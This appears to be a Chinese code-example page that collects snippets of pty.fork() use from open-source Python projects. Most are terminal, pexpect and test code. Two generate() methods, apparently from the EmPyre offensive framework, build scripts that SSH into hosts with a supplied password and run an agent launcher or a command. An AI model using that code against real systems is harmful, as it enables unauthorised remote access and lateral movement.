我们从Python开源项目中,提取了以下37个代码示例,用于说明如何使用pty.fork()。
def run_bg(cmd, debug=False, cwd=''): # make sure 'cmd' is a list of strings if type(cmd) in [str, unicode]: cmd = [c for c in cmd.split() if c != ''] if debug: sys.stderr.write(' '.join(cmd)+'\n') sys.stderr.flush() try: ( child_pid, child_fd ) = pty.fork() except OSError as e: raise RunError(cmd, None, message='pty.fork() failed: %s' % str(e)) if child_pid == 0: try: if cwd != '': os.chdir(cwd) os.execvp(cmd[0], cmd) except Exception, e: raise RunError(cmd, None, 'os.execvp() failed: %s' % str(e)) else: return child_pid, child_fd
def open_terminal(command="bash", columns=80, lines=24): p_pid, master_fd = pty.fork() if p_pid == 0: # Child. path, *args = shlex.split(command) args = [path] + args env = dict(TERM="linux", LC_ALL="en_GB.UTF-8", COLUMNS=str(columns), LINES=str(lines)) try: os.execvpe(path, args, env) except FileNotFoundError: print("Could not find the executable in %s. Press any key to exit." % path) exit() # set non blocking read flag = fcntl.fcntl(master_fd, fcntl.F_GETFD) fcntl.fcntl(master_fd, fcntl.F_SETFL, flag | os.O_NONBLOCK) # File-like object for I/O with the child process aka command. p_out = os.fdopen(master_fd, "w+b", 0) return Terminal(columns, lines), p_pid, p_out
def spawn(self, argv): ''' Create a spawned process. Based on the code for pty.spawn(). ''' assert self.master_fd is None assert isinstance(argv, list) pid, master_fd = pty.fork() self.master_fd = master_fd if pid == pty.CHILD: os.execlp(argv[0], *argv) # and not ever returned self._init() try: self._copy() # start communication except Exception: # unexpected errors self._del() raise self._del() return self.log.decode()
def main (): signal.signal (signal.SIGCHLD, signal_handler) pid, fd = pty.fork() if pid == 0: os.write (sys.stdout.fileno(), 'This is a test.\nThis is a test.') time.sleep(10000) nonblock (fd) tty.setraw(fd) #STDIN_FILENO) print 'Sending SIGKILL to child pid:', pid time.sleep(2) os.kill (pid, signal.SIGKILL) print 'Entering to sleep...' try: time.sleep(2) except: print 'Sleep interrupted' try: os.kill(pid, 0) print '\tChild is alive. This is ambiguous because it may be a Zombie.' except OSError as e: print '\tChild appears to be dead.' # print str(e) print print 'Reading from master fd:', os.read (fd, 1000)
def start_new_process(args, nice_value=0): "start a new process in a pty and renice it" data = {} data['start_time'] = time.time() pid, master_fd = pty.fork() if pid == CHILD: default_signals() if nice_value: os.nice(nice_value) os.execvp(args[0], [a.encode(cf['_charset'], "replace") for a in args]) else: data['pid'] = pid if os.uname()[0] == "Linux": fcntl.fcntl(master_fd, F_SETFL, O_NONBLOCK) data['fd'] = master_fd data['file'] = os.fdopen(master_fd) data['cmd'] = args data['buf'] = "" data['otf'] = 0 data['percent'] = 0 data['elapsed'] = 0 return data
def spawn(self): env = self.env env['TERM'] = 'linux' self.pid, self.master = pty.fork() if self.pid == 0: if callable(self.command): try: try: self.command() except: sys.stderr.write(traceback.format_exc()) sys.stderr.flush() finally: os._exit(0) else: os.execvpe(self.command[0], self.command, env) if self.main_loop is None: fcntl.fcntl(self.master, fcntl.F_SETFL, os.O_NONBLOCK) atexit.register(self.terminate)
def __init__(self, cmd, cwd): self._cmd_return_code = 0 self._cmd_kill_signal = 0 self._shell_pid, self._master_fd = pty.fork() if self._shell_pid == pty.CHILD: os.environ["TERM"] = "linux" os.chdir(cwd) os.execv(cmd[0], cmd)
def restart(self, cmd): if not self.completed: self.process_input("\n\033[01;31mProcess killed.\033[00m\r\n") os.kill(self.pid, signal.SIGHUP) thread = self.thread thread.stop() while thread.alive: QCoreApplication.processEvents() self.exit_pipe, child_pipe = os.pipe() pid, fd = pty.fork() if pid == 0: try: os.environ["TERM"] = "xterm-256color" retval = subprocess.call(cmd, close_fds=True) os.write(2, "\033[01;34mProcess has completed.\033[00m\n") os.write(child_pipe, "t") os._exit(retval) except: pass os.write(2, "\033[01;31mCommand '" + cmd[0] + "' failed to execute.\033[00m\n") os.write(child_pipe, "f") os._exit(1) os.close(child_pipe) self.process_input("\033[01;34mStarted process with PID %d.\033[00m\r\n" % pid) self.pid = pid self.data_pipe = fd self.completed = False # Initialize terminal settings fcntl.ioctl(self.data_pipe, termios.TIOCSWINSZ, struct.pack("hhhh", self.rows, self.cols, 0, 0)) attribute = termios.tcgetattr(self.data_pipe) termios.tcsetattr(self.data_pipe, termios.TCSAFLUSH, attribute) self.thread = TerminalUpdateThread(self, self.data_pipe, self.exit_pipe) self.thread.start()
def spawn(self, argv=None): ''' Create a spawned process. Based on the code for pty.spawn(). ''' assert self.master_fd is None pid, master_fd = pty.fork() self.master_fd = master_fd self.pid = pid if pid == pty.CHILD: if self.user is not None: try: uid = pwd.getpwnam(self.user).pw_uid except KeyError: log.error("No such user: %s", self.user) else: os.setuid(uid) log.debug('switched user for remote process to %s(%s)', self.user, uid) if self.group is not None: try: gid = grp.getgrnam(self.group).gr_gid except KeyError: log.error("No such group: %s", self.group) else: os.setgid(gid) log.debug('switched group for remote process to %s(%s)', self.group, gid) if not argv: argv = [os.environ['SHELL']] os.execlp(argv[0], *argv) # Previous command replaces the process return self._init_fd() try: self._copy() except (IOError, OSError): pass os.close(master_fd) self.master_fd = None
def __fork_pty(self): '''This implements a substitute for the forkpty system call. This should be more portable than the pty.fork() function. Specifically, this should work on Solaris. Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to resolve the issue with Python's pty.fork() not supporting Solaris, particularly ssh. Based on patch to posixmodule.c authored by Noah Spurrier:: http://mail.python.org/pipermail/python-dev/2003-May/035281.html ''' parent_fd, child_fd = os.openpty() if parent_fd < 0 or child_fd < 0: raise ExceptionPexpect("Could not open with os.openpty().") pid = os.fork() if pid == pty.CHILD: # Child. os.close(parent_fd) self.__pty_make_controlling_tty(child_fd) os.dup2(child_fd, self.STDIN_FILENO) os.dup2(child_fd, self.STDOUT_FILENO) os.dup2(child_fd, self.STDERR_FILENO) else: # Parent. os.close(child_fd) return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd): '''This makes the pseudo-terminal the controlling tty. This should be more portable than the pty.fork() function. Specifically, this should work on Solaris. ''' child_name = os.ttyname(tty_fd) # Disconnect from controlling tty, if any. Raises OSError of ENXIO # if there was no controlling tty to begin with, such as when # executed by a cron(1) job. try: fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) os.close(fd) except OSError as err: if err.errno != errno.ENXIO: raise os.setsid() # Verify we are disconnected from controlling tty by attempting to open # it again. We expect that OSError of ENXIO should always be raised. try: fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) os.close(fd) raise ExceptionPexpect("OSError of errno.ENXIO should be raised.") except OSError as err: if err.errno != errno.ENXIO: raise # Verify we can open child pty. fd = os.open(child_name, os.O_RDWR) os.close(fd) # Verify we now have a controlling tty. fd = os.open("/dev/tty", os.O_WRONLY) os.close(fd)
def sig_test (sig_handler_type, fork_type, child_output): print 'Testing with:' print '\tsig_handler_type:', sig_handler_type print '\tfork_type:', fork_type print '\tchild_output:', child_output if sig_handler_type == 'SIG_IGN': signal.signal (signal.SIGCHLD, signal.SIG_IGN) else: signal.signal (signal.SIGCHLD, signal_handler) pid = -1 fd = -1 if fork_type == 'ptyfork': pid, fd = pty.fork() else: pid = os.fork() if pid == 0: if child_output == 'yes': os.write (sys.stdout.fileno(), 'This is a test.\nThis is a test.') time.sleep(10000) #print 'Sending SIGKILL to child pid:', pid time.sleep(2) os.kill (pid, signal.SIGKILL) #print 'Entering to sleep...' try: time.sleep(2) except: pass try: os.kill(pid, 0) print '\tChild is alive. This is ambiguous because it may be a Zombie.' except OSError as e: print '\tChild appears to be dead.' # print str(e) print
def _create(self, rows=24, cols=80): pid, fd = pty.fork() if pid == 0: if os.getuid() == 0: cmd = ['/bin/login'] else: # The prompt has to end with a newline character. sys.stdout.write(socket.gethostname() + ' login: \n') login = sys.stdin.readline().strip() cmd = [ 'ssh', '-oPreferredAuthentications=keyboard-interactive,password', '-oNoHostAuthenticationForLocalhost=yes', '-oLogLevel=FATAL', '-F/dev/null', '-l', login, 'localhost', ] env = { 'COLUMNS': str(cols), 'LINES': str(rows), 'PATH': os.environ['PATH'], 'TERM': 'linux', } os.execvpe(cmd[0], cmd, env) else: fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NONBLOCK) fcntl.ioctl(fd, termios.TIOCSWINSZ, struct.pack('HHHH', rows, cols, 0, 0)) TermSocketHandler.clients[fd] = { 'client': self, 'pid': pid, 'terminal': Terminal(rows, cols) } return fd
def __fork_pty(self): """This implements a substitute for the forkpty system call. This should be more portable than the pty.fork() function. Specifically, this should work on Solaris. Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to resolve the issue with Python's pty.fork() not supporting Solaris, particularly ssh. Based on patch to posixmodule.c authored by Noah Spurrier:: http://mail.python.org/pipermail/python-dev/2003-May/035281.html """ parent_fd, child_fd = os.openpty() if parent_fd < 0 or child_fd < 0: raise ExceptionPexpect, "Error! Could not open pty with os.openpty()." pid = os.fork() if pid < 0: raise ExceptionPexpect, "Error! Failed os.fork()." elif pid == 0: # Child. os.close(parent_fd) self.__pty_make_controlling_tty(child_fd) os.dup2(child_fd, 0) os.dup2(child_fd, 1) os.dup2(child_fd, 2) if child_fd > 2: os.close(child_fd) else: # Parent. os.close(child_fd) return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd): """This makes the pseudo-terminal the controlling tty. This should be more portable than the pty.fork() function. Specifically, this should work on Solaris. """ child_name = os.ttyname(tty_fd) # Disconnect from controlling tty if still connected. fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) if fd >= 0: os.close(fd) os.setsid() # Verify we are disconnected from controlling tty try: fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) if fd >= 0: os.close(fd) raise ExceptionPexpect, "Error! We are not disconnected from a controlling tty." except: # Good! We are disconnected from a controlling tty. pass # Verify we can open child pty. fd = os.open(child_name, os.O_RDWR) if fd < 0: raise ExceptionPexpect, "Error! Could not open child pty, " + child_name else: os.close(fd) # Verify we now have a controlling tty. fd = os.open("/dev/tty", os.O_WRONLY) if fd < 0: raise ExceptionPexpect, "Error! Could not open controlling tty, /dev/tty" else: os.close(fd)
def commit(self): # ui self.status.setText(_("Installing '%s'...") % os.path.basename(self.debfile)) # the command cmd = "/usr/bin/dpkg" argv = [cmd, "--auto-deconfigure", "-i", self.debfile] (self.child_pid, self.master_fd) = pty.fork() if self.child_pid == 0: os.environ["TERM"] = "dumb" if not "DEBIAN_FRONTEND" in os.environ: os.environ["DEBIAN_FRONTEND"] = "noninteractive" os.environ["APT_LISTCHANGES_FRONTEND"] = "none" exitstatus = subprocess.call(argv) os._exit(exitstatus) while True: #Read from pty and write to DumbTerminal try: (rlist, wlist, xlist) = select.select([self.master_fd],[],[], 0.001) if len(rlist) > 0: line = os.read(self.master_fd, 255) self.parent.konsole.insertWithTermCodes(utf8(line)) except Exception as e: #print e from errno import EAGAIN if hasattr(e, "errno") and e.errno == EAGAIN: continue break KApplication.kApplication().processEvents() # at this point we got a read error from the pty, that most # likely means that the client is dead (pid, status) = os.waitpid(self.child_pid, 0) self.exitstatus = os.WEXITSTATUS(status) self.progress.setValue(100) self.parent.closeButton.setEnabled(True) self.parent.closeButton.setVisible(True) self.parent.installationProgress.setVisible(False) QTimer.singleShot(1, self.parent.changeSize)
def fork(self): """pty voodoo""" (self.child_pid, self.master_fd) = pty.fork() if self.child_pid == 0: os.environ["TERM"] = "dumb" if not "DEBIAN_FRONTEND" in os.environ: os.environ["DEBIAN_FRONTEND"] = "noninteractive" os.environ["APT_LISTCHANGES_FRONTEND"] = "none" return self.child_pid
def __init__(self, cmd, raw_debug = None): if os.name == "nt": raise RuntimeError, "Windows does not support pseudo-terminal devices" if cmd: # Spawn the new process in a new PTY self.exit_pipe, child_pipe = os.pipe() self.exit_callback = None pid, fd = pty.fork() if pid == 0: try: os.environ["TERM"] = "xterm-256color" if "PYTHONPATH" in os.environ: del(os.environ["PYTHONPATH"]) if "LD_LIBRARY_PATH" in os.environ: del(os.environ["LD_LIBRARY_PATH"]) if sys.platform == "darwin": if "DYLD_LIBRARY_PATH" in os.environ: del(os.environ["DYLD_LIBRARY_PATH"]) retval = subprocess.call(cmd, close_fds=True) os.write(2, "\033[01;34mProcess has completed.\033[00m\n") os.write(child_pipe, "t") os._exit(retval) except: pass os.write(2, "\033[01;31mCommand '" + cmd[0] + "' failed to execute.\033[00m\n") os.write(child_pipe, "f") os._exit(1) os.close(child_pipe) self.pid = pid self.data_pipe = fd else: self.exit_pipe = -1 self.pid = -1 self.data_pipe = -1 self.rows = 25 self.cols = 80 self.term = TerminalEmulator(self.rows, self.cols) self.raw_debug = raw_debug self.completed = False self.term.response_callback = self.send_input if cmd: # Initialize terminal settings fcntl.ioctl(self.data_pipe, termios.TIOCSWINSZ, struct.pack("hhhh", self.rows, self.cols, 0, 0)) attribute = termios.tcgetattr(self.data_pipe) termios.tcsetattr(self.data_pipe, termios.TCSAFLUSH, attribute) else: self.process_input("\033[01;33mEnter desired command arguments, then run again.\033[00m\r\n") self.completed = True
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None): if not sys.stdin.isatty() or not sys.stdout.isatty(): self.skipTest("stdin and stdout must be ttys") r, w = os.pipe() try: pid, fd = pty.fork() except (OSError, AttributeError) as e: os.close(r) os.close(w) self.skipTest("pty.fork() raised {}".format(e)) if pid == 0: # Child try: # Make sure we don't get stuck if there's a problem signal.alarm(2) os.close(r) # Check the error handlers are accounted for if stdio_encoding: sys.stdin = io.TextIOWrapper(sys.stdin.detach(), encoding=stdio_encoding, errors='surrogateescape') sys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding=stdio_encoding, errors='replace') with open(w, "w") as wpipe: print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe) print(ascii(input(prompt)), file=wpipe) except: traceback.print_exc() finally: # We don't want to return to unittest... os._exit(0) # Parent os.close(w) os.write(fd, terminal_input + b"\r\n") # Get results from the pipe with open(r, "r") as rpipe: lines = [] while True: line = rpipe.readline().strip() if line == "": # The other end was closed => the child exited break lines.append(line) # Check the result was got and corresponds to the user's terminal input if len(lines) != 2: # Something went wrong, try to get at stderr with open(fd, "r", encoding="ascii", errors="ignore") as child_output: self.fail("got %d lines in pipe but expected 2, child output was:\n%s" % (len(lines), child_output.read())) os.close(fd) # Check we did exercise the GNU readline path self.assertIn(lines[0], {'tty = True', 'tty = False'}) if lines[0] != 'tty = True': self.skipTest("standard IO in should have been a tty") input_result = eval(lines[1]) # ascii() -> eval() roundtrip if stdio_encoding: expected = terminal_input.decode(stdio_encoding, 'surrogateescape') else: expected = terminal_input.decode(sys.stdin.encoding) # what else? self.assertEqual(input_result, expected)
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None): if not sys.stdin.isatty() or not sys.stdout.isatty(): self.skipTest("stdin and stdout must be ttys") r, w = os.pipe() try: pid, fd = pty.fork() except (OSError, AttributeError) as e: os.close(r) os.close(w) self.skipTest("pty.fork() raised {0}".format(e)) if pid == 0: # Child try: # Make sure we don't get stuck if there's a problem signal.alarm(2) os.close(r) # Check the error handlers are accounted for if stdio_encoding: sys.stdin = io.TextIOWrapper(sys.stdin.detach(), encoding=stdio_encoding, errors='surrogateescape') sys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding=stdio_encoding, errors='replace') with open(w, "w") as wpipe: print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe) print(ascii(input(prompt)), file=wpipe) except: traceback.print_exc() finally: # We don't want to return to unittest... os._exit(0) # Parent os.close(w) os.write(fd, terminal_input + b"\r\n") # Get results from the pipe with open(r, "r") as rpipe: lines = [] while True: line = rpipe.readline().strip() if line == "": # The other end was closed => the child exited break lines.append(line) # Check the result was got and corresponds to the user's terminal input if len(lines) != 2: # Something went wrong, try to get at stderr with open(fd, "r", encoding="ascii", errors="ignore") as child_output: self.fail("got %d lines in pipe but expected 2, child output was:\n%s" % (len(lines), child_output.read())) os.close(fd) # Check we did exercise the GNU readline path self.assertIn(lines[0], set(['tty = True', 'tty = False'])) if lines[0] != 'tty = True': self.skipTest("standard IO in should have been a tty") input_result = eval(lines[1]) # ascii() -> eval() roundtrip if stdio_encoding: expected = terminal_input.decode(stdio_encoding, 'surrogateescape') else: expected = terminal_input.decode(sys.stdin.encoding) # what else? self.assertEqual(input_result, expected)
def __pty_make_controlling_tty(self, tty_fd): '''This makes the pseudo-terminal the controlling tty. This should be more portable than the pty.fork() function. Specifically, this should work on Solaris. ''' child_name = os.ttyname(tty_fd) # Disconnect from controlling tty. Harmless if not already connected. try: fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) if fd >= 0: os.close(fd) # which exception, shouldnt' we catch explicitly .. ? except OSError: # Already disconnected. This happens if running inside cron. pass os.setsid() # Verify we are disconnected from controlling tty # by attempting to open it again. try: fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY) if fd >= 0: os.close(fd) raise Exception('Failed to disconnect from ' + 'controlling tty. It is still possible to open /dev/tty.') # which exception, shouldnt' we catch explicitly .. ? except OSError: # Good! We are disconnected from a controlling tty. pass # Verify we can open child pty. fd = os.open(child_name, os.O_RDWR) if fd < 0: raise Exception("Could not open child pty, " + child_name) else: os.close(fd) # Verify we now have a controlling tty. fd = os.open("/dev/tty", os.O_WRONLY) if fd < 0: raise Exception("Could not open controlling tty, /dev/tty") else: os.close(fd)
def run_child(self, child, terminal_input): r, w = os.pipe() # Pipe test results from child back to parent try: pid, fd = pty.fork() except (OSError, AttributeError) as e: os.close(r) os.close(w) self.skipTest("pty.fork() raised {}".format(e)) raise if pid == 0: # Child try: # Make sure we don't get stuck if there's a problem signal.alarm(2) os.close(r) with open(w, "w") as wpipe: child(wpipe) except: traceback.print_exc() finally: # We don't want to return to unittest... os._exit(0) # Parent os.close(w) os.write(fd, terminal_input) # Get results from the pipe with open(r, "r") as rpipe: lines = [] while True: line = rpipe.readline().strip() if line == "": # The other end was closed => the child exited break lines.append(line) # Check the result was got and corresponds to the user's terminal input if len(lines) != 2: # Something went wrong, try to get at stderr # Beware of Linux raising EIO when the slave is closed child_output = bytearray() while True: try: chunk = os.read(fd, 3000) except OSError: # Assume EIO break if not chunk: break child_output.extend(chunk) os.close(fd) child_output = child_output.decode("ascii", "ignore") self.fail("got %d lines in pipe but expected 2, child output was:\n%s" % (len(lines), child_output)) os.close(fd) return lines
def generate(self): login = self.options['Login']['Value'] password = self.options['Password']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] littleSnitch = self.options['LittleSnitch']['Value'] isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName) if not isEmpire: print helpers.color("[!] EmPyre listener required!") return "" # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=littleSnitch) launcher = launcher.replace("'", "\\'") launcher = launcher.replace('"', '\\"') if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" script = """ import os import pty def wall(host, pw): import os,pty pid, fd = pty.fork() if pid == 0: os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s']) os._exit(1) os.read(fd, 1024) os.write(fd, '\\n' + pw + '\\n') result = [] while True: try: data = os.read(fd, 1024) if data == "Password:": os.write(fd, pw + '\\n') except OSError: break if not data: break result.append(data) pid, status = os.waitpid(pid, 0) return status, ''.join(result) status, output = wall('%s','%s') print status print output """ % (launcher, login, password) return script
def generate(self): login = self.options['Login']['Value'] password = self.options['Password']['Value'] command = self.options['Command']['Value'] # generate the launcher code script = """ import os import pty def wall(host, pw): import os,pty pid, fd = pty.fork() if pid == 0: # Child os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s']) os._exit(1) # fail to execv # read '..... password:', write password os.read(fd, 1024) os.write(fd, '\\n' + pw + '\\n') result = [] while True: try: data = os.read(fd, 1024) if data == "Password:": os.write(fd, pw + '\\n') except OSError: break if not data: break result.append(data) pid, status = os.waitpid(pid, 0) return status, ''.join(result) status, output = wall('%s','%s') print status print output """ % (command, login, password) return script
def open(self, command, env={}): """ Create subprocess using forkpty() """ # parse command command_arr = shlex.split(command) executable = command_arr[0] args = command_arr # try to fork a new pty try: self.pid, self.fd = pty.fork() except: return False # child proc, replace with command after altering terminal attributes if self.pid == 0: # set requested environment variables for k in env.keys(): os.environ[k] = env[k] # set tty attributes try: attrs = tty.tcgetattr(1) attrs[0] = attrs[0] ^ tty.IGNBRK attrs[0] = attrs[0] | tty.BRKINT | tty.IXANY | tty.IMAXBEL attrs[2] = attrs[2] | tty.HUPCL attrs[3] = attrs[3] | tty.ICANON | tty.ECHO | tty.ISIG | tty.ECHOKE attrs[6][tty.VMIN] = 1 attrs[6][tty.VTIME] = 0 tty.tcsetattr(1, tty.TCSANOW, attrs) except: pass # replace this process with the subprocess os.execvp(executable, args) # else master, do nothing else: pass
def ptyPopen(args, executable=None, env=None, shell=False): """Less featureful but inspired by subprocess.Popen. Runs subprocess in a pty""" # # Note: In theory the right answer here is to subclass Popen, # but we found that in practice we'd have to reimplement most # of that class, because its handling of file descriptors is # too brittle in its _execute_child() code. # def __drain(masterf, outlist): # Use a list as a way to pass by reference while True: chunksz = 1024 termdata = masterf.read(chunksz) outlist.append(termdata) if len(termdata) < chunksz: # assume we hit EOF break # This is the arg handling protocol from Popen if isinstance(args, six.string_types): args = [args] else: args = list(args) if shell: args = ["/bin/sh", "-c"] + args if executable: args[0] = executable if executable is None: executable = args[0] pid,fd = pty.fork() if pid == 0: try: # Child if env is None: os.execvp(executable, args) else: os.execvpe(executable, args, env) except: traceback.print_exc() os._exit(99) else: masterf = os.fdopen(fd, "rb") outlist = [] t = threading.Thread(target=__drain, args=(masterf, outlist)) t.start() waitedpid, retcode = os.waitpid(pid, 0) retcode = retcode >> 8 t.join() return retcode, b"".join(outlist)
def fakeroot_create(): test_root = os.path.join(g_tempdir, "ips.test.{0:d}".format(os.getpid())) fakeroot = os.path.join(test_root, "fakeroot") cmd_path = os.path.join(fakeroot, "pkg") try: os.stat(cmd_path) except OSError as e: pass else: # fakeroot already exists raise RuntimeError("The fakeroot shouldn't already exist.\n" "Path is:{0}".format(cmd_path)) # when creating the fakeroot we want to make sure pkg doesn't # touch the real root. env_sanitize(cmd_path) # # When accessing images via the pkg apis those apis will try # to access the image containing the command from which the # apis were invoked. Normally when running the test suite the # command is run.py in a developers workspace, and that # workspace lives in the root image. But accessing the root # image during a test suite run is verboten. Hence, here we # create a temporary image from which we can run the pkg # command. # # create directories mkdir_eexist_ok(test_root) mkdir_eexist_ok(fakeroot) debug("fakeroot image create {0}".format(fakeroot)) progtrack = pkg.client.progress.NullProgressTracker() api_inst = pkg.client.api.image_create(PKG_CLIENT_NAME, CLIENT_API_VERSION, fakeroot, pkg.client.api.IMG_TYPE_ENTIRE, False, progtrack=progtrack, cmdpath=cmd_path) # # put a copy of the pkg command in our fake root directory. # we do this because when recursive linked image commands are # run, the pkg interfaces may fork and exec additional copies # of pkg(1), and in this case we want them to run the copy of # pkg from the fake root. # fakeroot_cmdpath = os.path.join(fakeroot, "pkg") shutil.copy(os.path.join(g_pkg_path, "usr", "bin", "pkg"), fakeroot_cmdpath) return fakeroot, fakeroot_cmdpath